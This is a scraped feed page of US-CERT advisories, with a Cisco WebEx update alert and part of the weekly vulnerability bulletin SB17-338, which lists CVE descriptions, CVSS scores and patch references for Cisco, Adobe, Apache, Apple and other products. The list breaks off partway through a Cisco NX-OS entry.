Quantcast
Channel: CISA All NCAS Products
Viewing all 3440 articles
Browse latest View live

Cisco Releases Security Updates

November 29, 2017, 2:05 pm
$
0
0
Original release date: November 29, 2017

Cisco has released security updates to address vulnerabilities in its WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review the Cisco Security Advisory and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.


Search

SB17-338: Vulnerability Summary for the Week of November 27, 2017

December 3, 2017, 9:27 pm
$
0
0
Original release date: December 04, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

 

High Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
There were no high vulnerabilities recorded this week.
Back to top

 

Medium Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
cisco -- webex_meeting_centerA vulnerability in Cisco WebEx Meeting Center could allow an authenticated, remote attacker to initiate connections to arbitrary hosts, aka a "URL Redirection Vulnerability." The vulnerability is due to insufficient access control for HTTP traffic directed to the Cisco WebEx Meeting Center. An attacker could exploit this vulnerability by sending a malicious URL to the Cisco WebEx Meeting Center. An exploit could allow the attacker to connect to arbitrary hosts. Cisco Bug IDs: CSCvf63843.2017-11-304.0CVE-2017-12297
BID
SECTRACK
CONFIRM
cisco -- webex_meeting_centerA Buffer Overflow vulnerability in Cisco WebEx Network Recording Player for Advanced Recording Format (.arf) files could allow an attacker to execute arbitrary code on a system. An attacker could exploit this vulnerability by providing a user with a malicious .arf file via email or URL and convincing the user to launch the file. Exploitation of this vulnerability could allow arbitrary code execution on the system of the targeted user. This vulnerability affects Cisco WebEx Business Suite meeting sites, Cisco WebEx Meetings sites, Cisco WebEx Meetings Server, and Cisco WebEx ARF players. Cisco Bug IDs: CSCve10729, CSCve10771, CSCve10779, CSCve11521, CSCve11543.2017-11-304.3CVE-2017-12359
CONFIRM
cisco -- webex_meeting_centerA vulnerability in Cisco WebEx Network Recording Player for WebEx Recording Format (WRF) files could allow an attacker to cause a denial of service (DoS) condition. An attacker could exploit this vulnerability by providing a user with a malicious WRF file via email or URL and convincing the user to open the file. A successful exploit could cause an affected player to crash, resulting in a DoS condition. This vulnerability affects Cisco WebEx Business Suite meeting sites, Cisco WebEx Meetings sites, and Cisco WebEx WRF players. Cisco Bug IDs: CSCve30294, CSCve30301.2017-11-304.3CVE-2017-12360
BID
CONFIRM
cisco -- webex_meeting_centerA vulnerability in Cisco WebEx Event Center could allow an authenticated, remote attacker to view unlisted meeting information. The vulnerability is due to a design flaw in the product. An attacker could execute a query on an Event Center site to view scheduled meetings. A successful query would show both listed and unlisted meetings in the displayed information. An attacker could use this information to attend meetings that are not available for their attendance. Cisco Bug IDs: CSCvg33629.2017-11-304.0CVE-2017-12365
BID
SECTRACK
CONFIRM
cisco -- webex_meeting_centerA vulnerability in Cisco WebEx Meeting Center could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of an affected system. The vulnerability is due to insufficient input validation of some parameters that are passed to the web server of the affected system. An attacker could exploit this vulnerability by convincing a user to follow a malicious link or by intercepting a user request and injecting malicious code into the request. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected web interface or allow the attacker to access sensitive browser-based information. Cisco Bug IDs: CSCvf78635,, CSCvg52440.2017-11-304.3CVE-2017-12366
BID
SECTRACK
CONFIRM
cisco -- webex_meetings_serverA vulnerability in Cisco WebEx Meeting Server could allow an unauthenticated, remote attacker to modify the welcome message of a meeting on an affected system. The vulnerability is due to insufficient security settings on meetings. An attacker could exploit this vulnerability by modifying the welcome message to a meeting. A successful exploit could allow the attacker to modify the welcome message of any known meeting. Cisco Bug IDs: CSCvf68695.2017-11-305.0CVE-2017-12363
BID
SECTRACK
CONFIRM
Back to top

 

Low Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
There were no low vulnerabilities recorded this week.
Back to top

 

Severity Not Yet Assigned

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
adobe -- coldfusion
 		Adobe ColdFusion has a cross-site scripting (XSS) vulnerability. This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.2017-12-01not yet calculatedCVE-2017-11285
BID
SECTRACK
CONFIRM
adobe -- coldfusion
 		Adobe ColdFusion has an XML external entity (XXE) injection vulnerability. This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.2017-12-01not yet calculatedCVE-2017-11286
BID
SECTRACK
CONFIRM
adobe -- coldfusion
 		Adobe ColdFusion has an Untrusted Data Deserialization vulnerability. This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.2017-12-01not yet calculatedCVE-2017-11283
BID
SECTRACK
CONFIRM
adobe -- coldfusion
 		Adobe ColdFusion has an Untrusted Data Deserialization vulnerability. This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.2017-12-01not yet calculatedCVE-2017-11284
BID
SECTRACK
CONFIRM
adobe -- flash
 		Adobe Flash Player has an exploitable memory corruption vulnerability in the MP4 atom parser. Successful exploitation could lead to arbitrary code execution. This affects 26.0.0.151 and earlier.2017-12-01not yet calculatedCVE-2017-11282
BID
SECTRACK
CONFIRM
GENTOO
EXPLOIT-DB
adobe -- flash
 		Adobe Flash Player has an exploitable memory corruption vulnerability in the text handling function. Successful exploitation could lead to arbitrary code execution. This affects 26.0.0.151 and earlier.2017-12-01not yet calculatedCVE-2017-11281
BID
SECTRACK
CONFIRM
GENTOO
EXPLOIT-DB
EXPLOIT-DB
adobe -- robohelp
 		Adobe RoboHelp has an Open Redirect vulnerability. This affects versions before RH12.0.4.460 and RH2017 before RH2017.0.2.2017-12-01not yet calculatedCVE-2017-3105
BID
SECTRACK
CONFIRM
adobe -- robohelp
 		Adobe RoboHelp has a cross-site scripting (XSS) vulnerability. This affects versions before RH12.0.4.460 and RH2017 before RH2017.0.2.2017-12-01not yet calculatedCVE-2017-3104
BID
SECTRACK
CONFIRM
apache -- cxf_fediz
 		Apache CXF Fediz ships with a number of container-specific plugins to enable WS-Federation for applications. A CSRF (Cross Style Request Forgery) style vulnerability has been found in the Spring 2, Spring 3 and Spring 4 plugins in versions before 1.4.3 and 1.3.3. The vulnerability can result in a security context that is set up using a malicious client's roles for the given enduser.2017-11-30not yet calculatedCVE-2017-12631
MLIST
apache -- qpid_broker-j
 		In Apache Qpid Broker-J before 6.1.x before 6.1.5, the broker does not properly enforce a maximum frame size in AMQP 1.0 frames. A remote unauthenticated attacker could exploit this to cause the broker to exhaust all available memory and eventually terminate. Older AMQP protocols are not affected.2017-12-01not yet calculatedCVE-2017-15701
CONFIRM
MLIST
CONFIRM
apache -- qpid_broker-j
 		In Apache Qpid Broker-J 0.18 through 0.32, if the broker is configured with different authentication providers on different ports one of which is an HTTP port, then the broker can be tricked by a remote unauthenticated attacker connecting to the HTTP port into using an authentication provider that was configured on a different port. The attacker still needs valid credentials with the authentication provider on the spoofed port. This becomes an issue when the spoofed port has weaker authentication protection (e.g., anonymous access, default accounts) and is normally protected by firewall rules or similar which can be circumvented by this vulnerability. AMQP ports are not affected. Versions 6.0.0 and newer are not affected.2017-12-01not yet calculatedCVE-2017-15702
CONFIRM
MLIST
CONFIRM
apache -- struts
 		In Apache Struts 2.5 to 2.5.14, the REST Plugin is using an outdated JSON-lib library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted JSON payload.2017-12-01not yet calculatedCVE-2017-15707
SECTRACK
CONFIRM
apple -- macos_high_sierra
 		An issue was discovered in certain Apple products. macOS High Sierra before Security Update 2017-001 is affected. The issue involves the "Directory Utility" component. It allows attackers to obtain administrator access without a password via certain interactions involving entry of the root user name.2017-11-29not yet calculatedCVE-2017-13872
BID
SECTRACK
MISC
MISC
MISC
MISC
arq -- arq
 		The setpermissions function in the auto-updater in Arq before 5.9.7 for Mac allows local users to gain root privileges via a symlink attack on the updater binary itself.2017-12-01not yet calculatedCVE-2017-15357
MISC
CONFIRM
arq -- multiple_products
 		The (1) arq_updater, (2) arqcommitter, (3) standardrestorer, (4) arqglacierrestorer, and (5) arqs3glacierrestorer helper apps in Arq 5.x before 5.10 for Mac allow local users to gain root privileges via a crafted data packet.2017-12-01not yet calculatedCVE-2017-16895
MISC
CONFIRM
atlassian -- hipchat
 		The Hipchat for Mac desktop client is vulnerable to client-side remote code execution via video call link parsing. Hipchat for Mac desktop clients at or above version 4.0 and before version 4.30 are affected by this vulnerability.2017-11-27not yet calculatedCVE-2017-14586
BID
CONFIRM
CONFIRM
atlassian -- hipchat
 		A Server Side Request Forgery (SSRF) vulnerability could lead to remote code execution for authenticated administrators. This issue was introduced in version 2.2.0 of Hipchat Server and version 3.0.0 of Hipchat Data Center. Versions of Hipchat Server starting with 2.2.0 and before 2.2.6 are affected by this vulnerability. Versions of Hipchat Data Center starting with 3.0.0 and before 3.1.0 are affected.2017-11-27not yet calculatedCVE-2017-14585
BID
CONFIRM
CONFIRM
atlassian -- multiple_products
 		Atlassian Fisheye and Crucible versions less than 4.4.3 and version 4.5.0 are vulnerable to argument injection through filenames in Mercurial repositories, allowing attackers to execute arbitrary code on a system running the impacted software.2017-11-29not yet calculatedCVE-2017-14591
CONFIRM
aubio -- aubio
 		In aubio 0.4.6, a divide-by-zero error exists in the function new_aubio_source_wavread() in source_wavread.c, which may lead to DoS when playing a crafted audio file.2017-11-29not yet calculatedCVE-2017-17054
MISC
b3log/symphony -- b3log/symphony
 		b3log Symphony (aka Sym) 2.2.0 allows an XSS attack by sending a private letter with a certain /article URI, and a second private letter with a modified title.2017-11-27not yet calculatedCVE-2017-16956
CONFIRM
bazaar -- bazaar
 		Bazaar through 2.7.0, when Subprocess SSH is used, allows remote attackers to execute arbitrary commands via a bzr+ssh URL with an initial dash character in the hostname, a related issue to CVE-2017-9800, CVE-2017-12836, CVE-2017-12976, CVE-2017-16228, CVE-2017-1000116, and CVE-2017-1000117.2017-11-27not yet calculatedCVE-2017-14176
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
DEBIAN
bigtree -- bigtree_cms
 		A SQL injection vulnerability in core/inc/auto-modules.php in BigTree CMS through 4.2.19 allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database. The attack uses an admin/trees/add/process request with a crafted _tags[] parameter that is mishandled in a later admin/ajax/dashboard/approve-change request.2017-11-27not yet calculatedCVE-2017-16961
MISC
bluemotion -- ohmibod
 		The OhMiBod Remote app for Android and iOS allows remote attackers to impersonate users by sniffing network traffic for search responses from the OhMiBod API server and then editing the username, user_id, and token fields in data/data/com.ohmibod.remote2/shared_prefs/OMB.xml.2017-12-01not yet calculatedCVE-2017-14487
MISC
cisco -- application_policy_ infrastructure_controllers
 		A vulnerability in certain system script files that are installed at boot time on Cisco Application Policy Infrastructure Controllers could allow an authenticated, local attacker to gain elevated privileges and execute arbitrary commands with root privileges on an affected host operating system. The vulnerability is due to insufficient validation of user-controlled input that is supplied to certain script files of an affected system. An attacker could exploit this vulnerability by submitting crafted input to a script file on an affected system. A successful exploit could allow the attacker to gain elevated privileges and execute arbitrary commands with root privileges on the affected system. To exploit this vulnerability, the attacker would need to authenticate to the affected system by using valid administrator credentials. Cisco Bug IDs: CSCvf57274.2017-11-30not yet calculatedCVE-2017-12352
BID
SECTRACK
CONFIRM
cisco -- asynchos_software
 		A vulnerability in the Multipurpose Internet Mail Extensions (MIME) scanner of Cisco AsyncOS Software for Cisco Email Security Appliances (ESA) could allow an unauthenticated, remote attacker to bypass configured user filters on the device. The vulnerability is due to improper error handling of a malformed MIME header in an email attachment. An attacker could exploit this vulnerability by sending an email with a crafted MIME attachment. For example, a successful exploit could allow the attacker to bypass configured user filters to drop the email. The malformed MIME headers may not be RFC compliant. However, some mail clients could still allow users to access the attachment, which may not have been properly filtered by the device. Cisco Bug IDs: CSCvf44666.2017-11-30not yet calculatedCVE-2017-12353
BID
SECTRACK
CONFIRM
cisco -- data_center_network_manager
 		Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) Software could allow a remote attacker to inject arbitrary values into DCNM configuration parameters, redirect a user to a malicious website, inject malicious content into a DCNM client interface, or conduct a cross-site scripting (XSS) attack against a user of the affected software. Cisco Bug IDs: CSCvf40477, CSCvf63150, CSCvf68218, CSCvf68235, CSCvf68247.2017-11-30not yet calculatedCVE-2017-12347
BID
CONFIRM
cisco -- data_center_network_manager
 		Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) Software could allow a remote attacker to inject arbitrary values into DCNM configuration parameters, redirect a user to a malicious website, inject malicious content into a DCNM client interface, or conduct a cross-site scripting (XSS) attack against a user of the affected software. Cisco Bug IDs: CSCvf40477, CSCvf63150, CSCvf68218, CSCvf68235, CSCvf68247.2017-11-30not yet calculatedCVE-2017-12343
BID
CONFIRM
cisco -- data_center_network_manager
 		Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) Software could allow a remote attacker to inject arbitrary values into DCNM configuration parameters, redirect a user to a malicious website, inject malicious content into a DCNM client interface, or conduct a cross-site scripting (XSS) attack against a user of the affected software. Cisco Bug IDs: CSCvf40477, CSCvf63150, CSCvf68218, CSCvf68235, CSCvf68247.2017-11-30not yet calculatedCVE-2017-12345
BID
CONFIRM
cisco -- data_center_network_manager
 		Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) Software could allow a remote attacker to inject arbitrary values into DCNM configuration parameters, redirect a user to a malicious website, inject malicious content into a DCNM client interface, or conduct a cross-site scripting (XSS) attack against a user of the affected software. Cisco Bug IDs: CSCvf40477, CSCvf63150, CSCvf68218, CSCvf68235, CSCvf68247.2017-11-30not yet calculatedCVE-2017-12344
BID
CONFIRM
cisco -- data_center_network_manager
 		Multiple vulnerabilities in Cisco Data Center Network Manager (DCNM) Software could allow a remote attacker to inject arbitrary values into DCNM configuration parameters, redirect a user to a malicious website, inject malicious content into a DCNM client interface, or conduct a cross-site scripting (XSS) attack against a user of the affected software. Cisco Bug IDs: CSCvf40477, CSCvf63150, CSCvf68218, CSCvf68235, CSCvf68247.2017-11-30not yet calculatedCVE-2017-12346
BID
CONFIRM
cisco -- firepower_extensible_operating_system_and _nx-os
 		A vulnerability in the CLI of Cisco Firepower Extensible Operating System (FXOS) and NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. The vulnerability is due to insufficient input validation of command arguments to the CLI parser. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command. An exploit could allow the attacker to execute arbitrary commands at the user's privilege level. On products that support multiple virtual device contexts (VDCs), this vulnerability could allow the attacker to execute commands at the user's privilege level outside the user's environment. This vulnerability affects the following products running Cisco FXOS or NX-OS System Software: Firepower 4100 Series Next-Generation Firewall, Firepower 9300 Security Appliance, Multilayer Director Switches, Nexus 1000V Series Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Unified Computing System Manager. Cisco Bug IDs: CSCve51700, CSCve93833, CSCve93860, CSCve93863, CSCve93864, CSCve93880.2017-11-30not yet calculatedCVE-2017-12329
BID
SECTRACK
CONFIRM
cisco -- ios_xr
 		A vulnerability in the Local Packet Transport Services (LPTS) ingress frame-processing functionality of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause one of the LPTS processes on an affected system to restart unexpectedly, resulting in a brief denial of service (DoS) condition. The vulnerability is due to incomplete LPTS frame validation by the affected software. An attacker could exploit this vulnerability by sending crafted XML requests to the management interface of an affected system. A successful exploit could allow the attacker to cause one of the LPTS processes on the affected system to restart unexpectedly, which would impact LPTS traffic and cause a brief DoS condition while the process restarts. Cisco Bug IDs: CSCvf76332.2017-11-30not yet calculatedCVE-2017-12355
BID
SECTRACK
CONFIRM
cisco -- ip_phone_8800_series_devices
 		A vulnerability in Session Initiation Protocol (SIP) call handling in Cisco IP Phone 8800 Series devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition because the SIP process unexpectedly restarts. All active phone calls are dropped as the SIP process restarts. The vulnerability is due to incomplete input validation of the SIP packet header. An attacker could exploit this vulnerability by sending a malformed SIP packet to a targeted phone. An exploit could allow the attacker to cause a DoS condition because all phone calls are dropped when the SIP process unexpectedly restarts. Cisco Bug IDs: CSCvc62590.2017-11-30not yet calculatedCVE-2017-12328
BID
SECTRACK
CONFIRM
cisco -- jabber
 		A vulnerability in the web-based management interface of Cisco Jabber for Windows, Mac, Android, and iOS could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information. Cisco Bug IDs: CSCvf79080, CSCvf79088.2017-11-30not yet calculatedCVE-2017-12358
BID
CONFIRM
cisco -- jabber
 		A vulnerability in the web-based management interface of Cisco Jabber for Windows, Mac, Android, and iOS could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information. Cisco Bug IDs: CSCvf50378, CSCvg56018.2017-11-30not yet calculatedCVE-2017-12356
BID
SECTRACK
CONFIRM
cisco -- jabber
 		A vulnerability in Cisco Jabber for Windows could allow an unauthenticated, local attacker to access sensitive communications made by the Jabber client. An attacker could exploit this vulnerability to gain information to conduct additional attacks. The vulnerability is due to the way Cisco Jabber for Windows handles random number generation for file folders. An attacker could exploit the vulnerability by fixing the random number data used to establish Secure Sockets Layer (SSL) connections between clients. An exploit could allow the attacker to decrypt secure communications made by the Cisco Jabber for Windows client. Cisco Bug IDs: CSCve44806.2017-11-30not yet calculatedCVE-2017-12361
BID
SECTRACK
CONFIRM
cisco -- meeting_server
 		A vulnerability in Cisco Meeting Server versions prior to 2.2.2 could allow an authenticated, remote attacker to cause the system to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to video calls being made on systems with a particular configuration. An attacker could exploit this by knowing a valid URI that directs to a Cisco Meeting Server. An attacker could then make a video call and cause the system to reload. Cisco Bug IDs: CSCve65931.2017-11-30not yet calculatedCVE-2017-12362
BID
SECTRACK
CONFIRM
cisco -- nexus_series_switches
 		A vulnerability in the Open Agent Container (OAC) feature of Cisco Nexus Series Switches could allow an unauthenticated, local attacker to read and send packets outside the scope of the OAC. The vulnerability is due to insufficient internal security measures in the OAC feature. An attacker could exploit this vulnerability by crafting specific packets for communication on the device-internal network. A successful exploit could allow the attacker to run code on the underlying host operating system. OAC is not enabled by default. For a device to be vulnerable, an administrator would need to install and activate this feature. This vulnerability affects the following Cisco Nexus Series Switches: Nexus 2000 Series Fabric Extenders, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches. Cisco Bug IDs: CSCve53542, CSCvf36621.2017-11-30not yet calculatedCVE-2017-12342
SECTRACK
CONFIRM
cisco -- nx_os
 		A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. The vulnerability is due to insufficient input validation of command arguments to the CLI parser. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command and gaining unauthorized access to the underlying operating system of the device. An exploit could allow the attacker to execute arbitrary commands at the user's privilege level. On products that support multiple virtual device contexts (VDCs), this vulnerability could allow an attacker to execute commands at the user's privilege level outside the user's environment. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules. Cisco Bug IDs: CSCve99902, CSCvf14879.2017-11-30not yet calculatedCVE-2017-12330
BID
SECTRACK
CONFIRM
cisco -- nx_os
 		A vulnerability in the guest shell feature of Cisco NX-OS System Software could allow an authenticated, local attacker to read and send packets outside the scope of the guest shell container. An attacker would need valid administrator credentials to perform this attack. The vulnerability is due to insufficient internal security measures in the guest shell feature. An attacker could exploit this vulnerability by sending or receiving packets on the device-internal network outside of the guest shell container, aka "Unauthorized Internal Interface Access." This vulnerability affects the following products running Cisco NX-OS System Software: Nexus 3000 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules. Cisco Bug IDs: CSCvf33038.2017-11-30not yet calculatedCVE-2017-12351
BID
SECTRACK
CONFIRM
cisco -- nx_os
 		A vulnerability in Cisco NX-OS System Software could allow an authenticated, local attacker to bypass signature verification when loading a software patch. The vulnerability is due to insufficient NX-OS signature verification for software patches. An authenticated, local attacker could exploit this vulnerability to bypass signature verification and load a crafted, unsigned software patch on a targeted device. The attacker would need valid administrator credentials to perform this exploit. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Unified Computing System Manager. Cisco Bug IDs: CSCvf16494, CSCvf23655.2017-11-30not yet calculatedCVE-2017-12331
SECTRACK
CONFIRM
cisco -- nx_os
 		A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. An attacker would need valid administrator credentials to perform this exploit. The vulnerability is due to insufficient input validation during the installation of a software patch. An attacker could exploit this vulnerability by installing a crafted patch image with the vulnerable operation occurring prior to patch activation. An exploit could allow the attacker to execute arbitrary commands on an affected system as root. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Unified Computing System Manager. Cisco Bug IDs: CSCvf23735, CSCvg04072.2017-11-30not yet calculatedCVE-2017-12341
SECTRACK
CONFIRM
cisco -- nx_os
 		A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. An attacker would need valid administrator credentials to perform this exploit. The vulnerability is due to insufficient input validation of command arguments. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command. An exploit could allow the attacker to execute arbitrary commands as root. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Unified Computing System Manager. Cisco Bug IDs: CSCvf15113, CSCvf15122, CSCvf15125, CSCvf15131, CSCvf15143, CSCvg04088.2017-11-30not yet calculatedCVE-2017-12334
SECTRACK
CONFIRM
cisco -- nx_os
 		A vulnerability in Cisco NX-OS System Software could allow an authenticated, local attacker to bypass signature verification when loading a software image. The vulnerability is due to insufficient NX-OS signature verification for software images. An authenticated, local attacker could exploit this vulnerability to bypass signature verification and load a crafted, unsigned software image on a targeted device. The attacker would need valid administrator credentials to perform this exploit. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Unified Computing System Manager. Cisco Bug IDs: CSCvf25045, CSCvf31495.2017-11-30not yet calculatedCVE-2017-12333
SECTRACK
CONFIRM
cisco -- nx_os
 		A vulnerability in Cisco NX-OS System Software patch installation could allow an authenticated, local attacker to write a file to arbitrary locations. The vulnerability is due to insufficient restrictions in the patch installation process. An attacker could exploit this vulnerability by installing a crafted patch image on an affected device. The vulnerable operation occurs prior to patch activation. An exploit could allow the attacker to write arbitrary files on an affected system as root. The attacker would need valid administrator credentials to perform this exploit. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Unified Computing System Manager. Cisco Bug IDs: CSCvf16513, CSCvf23794, CSCvf23832.2017-11-30not yet calculatedCVE-2017-12332
SECTRACK
CONFIRM
cisco -- nx_os
 		A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. The vulnerability is due to insufficient input validation of command arguments to the CLI parser. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command. An exploit could allow the attacker to execute arbitrary commands at the user's privilege level. On products that support multiple virtual device contexts (VDCs), this vulnerability could allow the attacker to execute commands at the user's privilege level outside the user's environment. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode, Nexus 9000 Series Switches in standalone NX-OS mode, and Nexus 9500 R-Series Line Cards and Fabric Modules. Cisco Bug IDs: CSCve99925, CSCvf15164, CSCvf15167, CSCvf15170, CSCvf15173.2017-11-30not yet calculatedCVE-2017-12339
SECTRACK
CONFIRM
cisco -- nx_os
 		A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. The vulnerability is due to insufficient input validation of command arguments. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command and gain unauthorized access to the underlying operating system of the device. An exploit could allow the attacker to execute arbitrary commands at the user's privilege level. On products that support multiple virtual device contexts (VDCs), this vulnerability could allow an attacker to execute commands at the user's privilege level outside the user's environment. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Unified Computing System Manager. Cisco Bug IDs: CSCvf14923, CSCvf14926, CSCvg04095.2017-11-30not yet calculatedCVE-2017-12335
SECTRACK
CONFIRM
cisco -- nx_os
 		A vulnerability in the TCL scripting subsystem of Cisco NX-OS System Software could allow an authenticated, local attacker to escape the interactive TCL shell and gain unauthorized access to the underlying operating system of the device. The vulnerability exists due to insufficient input validation of user-supplied files passed to the interactive TCL shell of the affected device. An attacker could exploit this vulnerability to escape the scripting sandbox and execute arbitrary commands on the underlying operating system with the privileges of the authenticated user. To exploit this vulnerability, an attacker must have local access and be authenticated to the targeted device with administrative or tclsh execution privileges. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Unified Computing System Manager. Cisco Bug IDs: CSCve93750, CSCve93762, CSCve93763, CSCvg04127.2017-11-30not yet calculatedCVE-2017-12336
SECTRACK
CONFIRM
cisco -- nx_os
 		A vulnerability in Cisco NX-OS System Software running on Cisco MDS Multilayer Director Switches, Cisco Nexus 7000 Series Switches, and Cisco Nexus 7700 Series Switches could allow an authenticated, local attacker to access the Bash shell of an affected device's operating system, even if the Bash shell is disabled on the system. The vulnerability is due to insufficient sanitization of user-supplied parameters that are passed to certain functions of the Python scripting sandbox of the affected system. An attacker could exploit this vulnerability to escape the scripting sandbox and enter the Bash shell of the operating system with the privileges of the authenticated user for the affected system. To exploit this vulnerability, the attacker must have local access to the affected system and be authenticated to the affected system with administrative or Python execution privileges. Cisco Bug IDs: CSCvd86513.2017-11-30not yet calculatedCVE-2017-12340
CONFIRM
cisco -- nx_os
